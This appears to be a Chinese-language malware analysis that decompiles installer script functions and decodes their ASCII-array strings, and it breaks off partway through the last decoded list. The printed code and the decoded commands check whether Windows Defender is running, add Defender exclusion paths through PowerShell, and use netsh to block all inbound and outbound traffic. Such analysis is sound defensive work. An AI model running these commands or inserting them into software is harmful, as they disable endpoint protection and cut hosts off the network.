pushvar Var7 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype UnicodeString_2 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype S32 ; StackCount = 11        assign Var11, S32(5)        pushvar Var10 ; StackCount = 12        call SETARRAYLENGTH        pop ; StackCount = 11        pop ; StackCount = 10        assign Var10[0], S32(110)        assign Var10[1], S32(101)        assign Var10[2], S32(116)        assign Var10[3], S32(115)        assign Var10[4], S32(104)        assign Var9, Var10        pop ; StackCount = 9        pushvar Var8 ; StackCount = 10        call STRFROMCODE        pop ; StackCount = 9        pop ; StackCount = 8        pushvar Var2 ; StackCount = 9        call EXEC        pop ; StackCount = 8        pop ; StackCount = 7        pop ; StackCount = 6        pop ; StackCount = 5        pop ; StackCount = 4        pop ; StackCount = 3        pop ; StackCount = 2        pop ; StackCount = 1        pushtype BOOLEAN ; StackCount = 2        pushtype Pointer ; StackCount = 3        setptr Var3, Var1        pushtype U8_4 ; StackCount = 4        assign Var4, U8_4(1)        pushtype S32 ; StackCount = 5        assign Var5, S32(0)        pushtype UnicodeString_2 ; StackCount = 6        assign Var6, String_3("")        pushtype UnicodeString_2 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(69)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(97)        assign Var9[1], S32(100)        assign Var9[2], S32(118)        assign Var9[3], S32(102)        assign Var9[4], S32(105)        assign Var9[5], S32(114)        assign Var9[6], S32(101)        assign Var9[7], S32(119)        assign Var9[8], S32(97)        assign Var9[9], S32(108)        assign Var9[10], S32(108)        assign Var9[11], S32(32)        assign Var9[12], S32(115)        assign Var9[13], S32(101)        assign Var9[14], S32(116)        assign Var9[15], S32(32)        assign Var9[16], S32(97)        assign Var9[17], S32(108)        assign Var9[18], S32(108)        assign Var9[19], S32(112)        assign Var9[20], S32(114)        assign Var9[21], S32(111)        assign Var9[22], S32(102)        assign Var9[23], S32(105)        assign Var9[24], S32(108)        assign Var9[25], S32(101)        assign Var9[26], S32(115)        assign Var9[27], S32(32)        assign Var9[28], S32(102)        assign Var9[29], S32(105)        assign Var9[30], S32(114)        assign Var9[31], S32(101)        assign Var9[32], S32(119)        assign Var9[33], S32(97)        assign Var9[34], S32(108)        assign Var9[35], S32(108)        assign Var9[36], S32(112)        assign Var9[37], S32(111)        assign Var9[38], S32(108)        assign Var9[39], S32(105)        assign Var9[40], S32(99)        assign Var9[41], S32(121)        assign Var9[42], S32(32)        assign Var9[43], S32(98)        assign Var9[44], S32(108)        assign Var9[45], S32(111)        assign Var9[46], S32(99)        assign Var9[47], S32(107)        assign Var9[48], S32(105)        assign Var9[49], S32(110)        assign Var9[50], S32(98)        assign Var9[51], S32(111)        assign Var9[52], S32(117)        assign Var9[53], S32(110)        assign Var9[54], S32(100)        assign Var9[55], S32(44)        assign Var9[56], S32(98)        assign Var9[57], S32(108)        assign Var9[58], S32(111)        assign Var9[59], S32(99)        assign Var9[60], S32(107)        assign Var9[61], S32(111)        assign Var9[62], S32(117)        assign Var9[63], S32(116)        assign Var9[64], S32(98)        assign Var9[65], S32(111)        assign Var9[66], S32(117)        assign Var9[67], S32(110)        assign Var9[68], S32(100)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var7 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype UnicodeString_2 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype S32 ; StackCount = 11        assign Var11, S32(5)        pushvar Var10 ; StackCount = 12        call SETARRAYLENGTH        pop ; StackCount = 11        pop ; StackCount = 10        assign Var10[0], S32(110)        assign Var10[1], S32(101)        assign Var10[2], S32(116)        assign Var10[3], S32(115)        assign Var10[4], S32(104)        assign Var9, Var10        pop ; StackCount = 9        pushvar Var8 ; StackCount = 10        call STRFROMCODE        pop ; StackCount = 9        pop ; StackCount = 8        pushvar Var2 ; StackCount = 9        call EXEC        pop ; StackCount = 8        pop ; StackCount = 7        pop ; StackCount = 6        pop ; StackCount = 5        pop ; StackCount = 4        pop ; StackCount = 3        pop ; StackCount = 2        pop ; StackCount = 1        ret
这个函数包含两个ASCII码数组,用于构建命令字符串。
以下是所有数组的ASCII码还原结果及其对应的字符串:

  1. 第一个数组(36字节)ASCII码:97, 100, 118, 102, 105, 114, 101, 119, 97, 108, 108, 32, 115, 101, 116, 32, 97, 108, 108, 112, 114, 111, 102, 105, 108, 101, 115, 32, 115, 116, 97, 116, 101, 32, 111, 110字符串:"advfirewall set allprofiles state on"

  2. 第二个数组(5字节)ASCII码:110, 101, 116, 115, 104字符串:"netsh"

  3. 第三个数组(69字节)ASCII码:97, 100, 118, 102, 105, 114, 101, 119, 97, 108, 108, 32, 115, 101, 116, 32, 97, 108, 108, 112, 114, 111, 102, 105, 108, 101, 115, 32, 102, 105, 114, 101, 119, 97, 108, 108, 112, 111, 108, 105, 99, 121, 32, 98, 108, 111, 99, 107, 105, 110, 98, 111, 117, 110, 100, 44, 98, 108, 111, 99, 107, 111, 117, 116, 98, 111, 117, 110, 100字符串:"advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound"

  4. 第四个数组(5字节)ASCII码:110, 101, 116, 115, 104字符串:"netsh"

这个函数通过执行两个netsh命令来配置Windows防火墙:启用所有防火墙配置文件:netsh advfirewall set allprofiles state on阻止所有入站和出站连接:netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound
作用:打开Windows防火墙,并设置防火墙策略为阻止所有入站和出站连接。
针对Windows Defender还有"ISDEFENDERRUNNING"函数和"ADDDEFENDEREXCLUSION"函数,我们来看一下。先看"ISDEFENDERRUNNING"函数: 复制代码 隐藏代码.function(export) BOOLEAN ISDEFENDERRUNNING()        pushtype Variant ; StackCount = 1        pushtype Variant ; StackCount = 2        pushtype Variant ; StackCount = 3        pushtype UnicodeString_2 ; StackCount = 4        pushtype UnicodeString_2 ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype UnicodeString_2 ; StackCount = 7        assign RetVal, BOOLEAN(0)        starteh null, loc_b35, null, loc_b43        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(26)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(87)        assign Var9[1], S32(66)        assign Var9[2], S32(69)        assign Var9[3], S32(77)        assign Var9[4], S32(83)        assign Var9[5], S32(99)        assign Var9[6], S32(114)        assign Var9[7], S32(105)        assign Var9[8], S32(112)        assign Var9[9], S32(116)        assign Var9[10], S32(105)        assign Var9[11], S32(110)        assign Var9[12], S32(103)        assign Var9[13], S32(46)        assign Var9[14], S32(83)        assign Var9[15], S32(87)        assign Var9[16], S32(66)        assign Var9[17], S32(69)        assign Var9[18], S32(77)        assign Var9[19], S32(76)        assign Var9[20], S32(111)        assign Var9[21], S32(99)        assign Var9[22], S32(97)        assign Var9[23], S32(116)        assign Var9[24], S32(111)        assign Var9[25], S32(114)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var4 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype WideString ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11        pushtype S32 ; StackCount = 12        assign Var12, S32(4)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(114)        assign Var11[1], S32(111)        assign Var11[2], S32(111)        assign Var11[3], S32(116)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        assign Var8, Var9        pop ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11        pushtype S32 ; StackCount = 12        assign Var12, S32(1)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(92)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        add Var8, Var9        pop ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11        pushtype S32 ; StackCount = 12        assign Var12, S32(5)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(99)        assign Var11[1], S32(105)        assign Var11[2], S32(109)        assign Var11[3], S32(118)        assign Var11[4], S32(50)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        add Var8, Var9        pop ; StackCount = 8        assign Var5, Var8        pop ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(11)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(77)        assign Var9[1], S32(115)        assign Var9[2], S32(77)        assign Var9[3], S32(112)        assign Var9[4], S32(69)        assign Var9[5], S32(110)        assign Var9[6], S32(103)        assign Var9[7], S32(46)        assign Var9[8], S32(101)        assign Var9[9], S32(120)        assign Var9[10], S32(101)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var6 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype WideString ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11        pushtype S32 ; StackCount = 12        assign Var12, S32(40)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(83)        assign Var11[1], S32(69)        assign Var11[2], S32(76)        assign Var11[3], S32(69)        assign Var11[4], S32(67)        assign Var11[5], S32(84)        assign Var11[6], S32(32)        assign Var11[7], S32(42)        assign Var11[8], S32(32)        assign Var11[9], S32(70)        assign Var11[10], S32(82)        assign Var11[11], S32(79)        assign Var11[12], S32(77)        assign Var11[13], S32(32)        assign Var11[14], S32(87)        assign Var11[15], S32(105)        assign Var11[16], S32(110)        assign Var11[17], S32(51)        assign Var11[18], S32(50)        assign Var11[19], S32(95)        assign Var11[20], S32(80)        assign Var11[21], S32(114)        assign Var11[22], S32(111)        assign Var11[23], S32(99)        assign Var11[24], S32(101)        assign Var11[25], S32(115)        assign Var11[26], S32(115)        assign Var11[27], S32(32)        assign Var11[28], S32(87)        assign Var11[29], S32(72)        assign Var11[30], S32(69)        assign Var11[31], S32(82)        assign Var11[32], S32(69)        assign Var11[33], S32(32)        assign Var11[34], S32(78)        assign Var11[35], S32(97)        assign Var11[36], S32(109)        assign Var11[37], S32(101)        assign Var11[38], S32(61)        assign Var11[39], S32(34)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        assign Var8, Var9        pop ; StackCount = 8        add Var8, Var6        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11        pushtype S32 ; StackCount = 12        assign Var12, S32(1)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(34)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        add Var8, Var9        pop ; StackCount = 8        assign Var7, Var8        pop ; StackCount = 7        pushtype IDISPATCH ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        assign Var9, Var4        pushvar Var8 ; StackCount = 10        call CREATEOLEOBJECT        pop ; StackCount = 9        pop ; StackCount = 8        assign Var1, Var8        pop ; StackCount = 7        pushtype !OPENARRAYOFVARIANT ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(2)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], String_3("")        assign Var9[1], Var5        assign Var8, Var9        pop ; StackCount = 8        pushtype String_3 ; StackCount = 9        assign Var9, String_3("ConnectServer")        pushtype BOOLEAN ; StackCount = 10        assign Var10, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 11        assign Var11, Var1        pushvar Var2 ; StackCount = 12        call IDISPATCHINVOKE        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        pop ; StackCount = 7        pushtype !OPENARRAYOFVARIANT ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(1)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], Var7        assign Var8, Var9        pop ; StackCount = 8        pushtype String_3 ; StackCount = 9        assign Var9, String_3("ExecQuery")        pushtype BOOLEAN ; StackCount = 10        assign Var10, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 11        assign Var11, Var2        pushvar Var3 ; StackCount = 12        call IDISPATCHINVOKE        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        pop ; StackCount = 7        pushtype Variant ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype !OPENARRAYOFVARIANT ; StackCount = 10        pushtype S32 ; StackCount = 11        assign Var11, S32(0)        pushvar Var10 ; StackCount = 12        call SETARRAYLENGTH        pop ; StackCount = 11        pop ; StackCount = 10        assign Var9, Var10        pop ; StackCount = 9        pushtype String_3 ; StackCount = 10        assign Var10, String_3("Count")        pushtype BOOLEAN ; StackCount = 11        assign Var11, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 12        assign Var12, Var3        pushvar Var8 ; StackCount = 13        call IDISPATCHINVOKE        pop ; StackCount = 12        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        gt RetVal, Var8, S32(0)        pop ; StackCount = 7        endtryloc_b35:        assign RetVal, BOOLEAN(0)        endcatchloc_b43:        ret
以下是所有ASCII码数组的还原结果:

  1. 第一个数组(26字节)ASCII码:87, 66, 69, 77, 83, 99, 114, 105, 112, 116, 105, 110, 103, 46, 83, 87, 66, 69, 77, 76, 111, 99, 97, 116, 111, 114字符串:"WBEMScripting.SWBEMLocator"

  2. 第二个数组(4字节)ASCII码:114, 111, 111, 116字符串:"root"

  3. 第三个数组(1字节)ASCII码:92字符串:""

  4. 第四个数组(5字节)ASCII码:99, 105, 109, 118, 50字符串:"cimv2"

  5. 第五个数组(11字节)ASCII码:77, 115, 77, 112, 69, 110, 103, 46, 101, 120, 101字符串:"MsMpEng.exe"

  6. 第六个数组(40字节)ASCII码:83, 69, 76, 69, 67, 84, 32, 42, 32, 70, 82, 79, 77, 32, 87, 105, 110, 51, 50, 95, 80, 114, 111, 99, 101, 115, 115, 32, 87, 72, 69, 82, 69, 32, 78, 97, 109, 101, 61, 34字符串:"SELECT * FROM Win32_Process WHERE Name=""

  7. 第七个数组(1字节)ASCII码:34字符串:"""

这个函数通过WMI查询检查Windows Defender进程(MsMpEng.exe)是否在运行。它构建WQL查询语句:SELECT * FROM Win32_Process WHERE Name="MsMpEng.exe"如果查询返回结果计数大于0,则返回True,表示Windows Defender进程在运行。
再看"ADDDEFENDEREXCLUSION"函数: 复制代码 隐藏代码.function(export) void ADDDEFENDEREXCLUSION()        pushtype S32 ; StackCount = 1        pushtype UnicodeString_2 ; StackCount = 2        pushtype UnicodeString_2 ; StackCount = 3        pushtype UnicodeString_2 ; StackCount = 4        pushtype BOOLEAN ; StackCount = 5        pushvar Var5 ; StackCount = 6        call ISDEFENDERRUNNING        pop ; StackCount = 5        sfz Var5        pop ; StackCount = 4        jf loc_ead        pushtype Type30 ; StackCount = 5        pushtype Type30 ; StackCount = 6        pushtype S32 ; StackCount = 7        assign Var7, S32(14)        pushvar Var6 ; StackCount = 8        call SETARRAYLENGTH        pop ; StackCount = 7        pop ; StackCount = 6        assign Var6[0], S32(112)        assign Var6[1], S32(111)        assign Var6[2], S32(119)        assign Var6[3], S32(101)        assign Var6[4], S32(114)        assign Var6[5], S32(115)        assign Var6[6], S32(104)        assign Var6[7], S32(101)        assign Var6[8], S32(108)        assign Var6[9], S32(108)        assign Var6[10], S32(46)        assign Var6[11], S32(101)        assign Var6[12], S32(120)        assign Var6[13], S32(101)        assign Var5, Var6        pop ; StackCount = 5        pushvar Var2 ; StackCount = 6        call STRFROMCODE        pop ; StackCount = 5        pop ; StackCount = 4        pushtype Type30 ; StackCount = 5        pushtype Type30 ; StackCount = 6        pushtype S32 ; StackCount = 7        assign Var7, S32(8)        pushvar Var6 ; StackCount = 8        call SETARRAYLENGTH        pop ; StackCount = 7        pop ; StackCount = 6        assign Var6[0], S32(45)        assign Var6[1], S32(67)        assign Var6[2], S32(111)        assign Var6[3], S32(109)        assign Var6[4], S32(109)        assign Var6[5], S32(97)        assign Var6[6], S32(110)        assign Var6[7], S32(100)        assign Var5, Var6        pop ; StackCount = 5        pushvar Var3 ; StackCount = 6        call STRFROMCODE        pop ; StackCount = 5        pop ; StackCount = 4        pushtype Type30 ; StackCount = 5        pushtype Type30 ; StackCount = 6        pushtype S32 ; StackCount = 7        assign Var7, S32(1)        pushvar Var6 ; StackCount = 8        call SETARRAYLENGTH        pop ; StackCount = 7        pop ; StackCount = 6        assign Var6[0], S32(34)        assign Var5, Var6        pop ; StackCount = 5        pushvar Var4 ; StackCount = 6        call STRFROMCODE        pop ; StackCount = 5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(16)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(65)        assign Var8[1], S32(100)        assign Var8[2], S32(100)        assign Var8[3], S32(45)        assign Var8[4], S32(77)        assign Var8[5], S32(112)        assign Var8[6], S32(80)        assign Var8[7], S32(114)        assign Var8[8], S32(101)        assign Var8[9], S32(102)        assign Var8[10], S32(101)        assign Var8[11], S32(114)        assign Var8[12], S32(101)        assign Var8[13], S32(110)        assign Var8[14], S32(99)        assign Var8[15], S32(101)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(32)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(14)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(45)        assign Var8[1], S32(69)        assign Var8[2], S32(120)        assign Var8[3], S32(99)        assign Var8[4], S32(108)        assign Var8[5], S32(117)        assign Var8[6], S32(115)        assign Var8[7], S32(105)        assign Var8[8], S32(111)        assign Var8[9], S32(110)        assign Var8[10], S32(80)        assign Var8[11], S32(97)        assign Var8[12], S32(116)        assign Var8[13], S32(104)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(32)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(39)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(25)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(67)        assign Var8[1], S32(58)        assign Var8[2], S32(92)        assign Var8[3], S32(85)        assign Var8[4], S32(115)        assign Var8[5], S32(101)        assign Var8[6], S32(114)        assign Var8[7], S32(115)        assign Var8[8], S32(92)        assign Var8[9], S32(80)        assign Var8[10], S32(117)        assign Var8[11], S32(98)        assign Var8[12], S32(108)        assign Var8[13], S32(105)        assign Var8[14], S32(99)        assign Var8[15], S32(92)        assign Var8[16], S32(68)        assign Var8[17], S32(111)        assign Var8[18], S32(99)        assign Var8[19], S32(117)        assign Var8[20], S32(109)        assign Var8[21], S32(101)        assign Var8[22], S32(110)        assign Var8[23], S32(116)        assign Var8[24], S32(115)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(39)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(44)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(32)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(39)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(13)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(67)        assign Var8[1], S32(58)        assign Var8[2], S32(92)        assign Var8[3], S32(67)        assign Var8[4], S32(110)        assign Var8[5], S32(100)        assign Var8[6], S32(111)        assign Var8[7], S32(109)        assign Var8[8], S32(54)        assign Var8[9], S32(46)        assign Var8[10], S32(115)        assign Var8[11], S32(121)        assign Var8[12], S32(115)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(39)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(34)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype BOOLEAN ; StackCount = 5        pushtype Pointer ; StackCount = 6        setptr Var6, Var1        pushtype U8_4 ; StackCount = 7        assign Var7, U8_4(1)        pushtype S32 ; StackCount = 8        assign Var8, S32(0)        pushtype UnicodeString_2 ; StackCount = 9        assign Var9, String_3("")        pushtype UnicodeString_2 ; StackCount = 10        pushtype WideString ; StackCount = 11        assign Var11, Var3        pushtype UnicodeString_2 ; StackCount = 12        pushtype Type30 ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype S32 ; StackCount = 15        assign Var15, S32(1)        pushvar Var14 ; StackCount = 16        call SETARRAYLENGTH        pop ; StackCount = 15        pop ; StackCount = 14        assign Var14[0], S32(32)        assign Var13, Var14        pop ; StackCount = 13        pushvar Var12 ; StackCount = 14        call STRFROMCODE        pop ; StackCount = 13        pop ; StackCount = 12        add Var11, Var12        pop ; StackCount = 11        add Var11, Var4        assign Var10, Var11        pop ; StackCount = 10        pushtype UnicodeString_2 ; StackCount = 11        assign Var11, Var2        pushvar Var5 ; StackCount = 12        call EXEC        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        pop ; StackCount = 7        pop ; StackCount = 6        pop ; StackCount = 5        pop ; StackCount = 4        pushtype S32 ; StackCount = 5        assign Var5, S32(4000)        call SLEEP        pop ; StackCount = 4loc_ead:        ret
以下是所有ASCII码数组的还原结果:

  1. 第一个数组(14字节)ASCII码:112, 111, 119, 101, 114, 115, 104, 101, 108, 108, 46, 101, 120, 101字符串:"powershell.exe"

  2. 第二个数组(8字节)ASCII码:45, 67, 111, 109, 109, 97, 110, 100字符串:"-Command"

  3. 第三个数组(1字节)ASCII码:34字符串:"""

  4. 第四个数组(16字节)ASCII码:65, 100, 100, 45, 77, 112, 80, 114, 101, 102, 101, 114, 101, 110, 99, 101字符串:"Add-MpPreference"

  5. 第五个数组(1字节)ASCII码:32字符串:" "

  6. 第六个数组(14字节)ASCII码:45, 69, 120, 99, 108, 117, 115, 105, 111, 110, 80, 97, 116, 104字符串:"-ExclusionPath"

  7. 第七个数组(1字节)ASCII码:32字符串:" "

  8. 第八个数组(1字节)ASCII码:39字符串:"'"

  9. 第九个数组(25字节)ASCII码:67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115字符串:"C:UsersPublicDocuments"

  10. 第十个数组(1字节)ASCII码:39字符串:"'"

  11. 第十一个数组(1字节)ASCII码:44字符串:","

  12. 第十二个数组(1字节)ASCII码:32字符串:" "

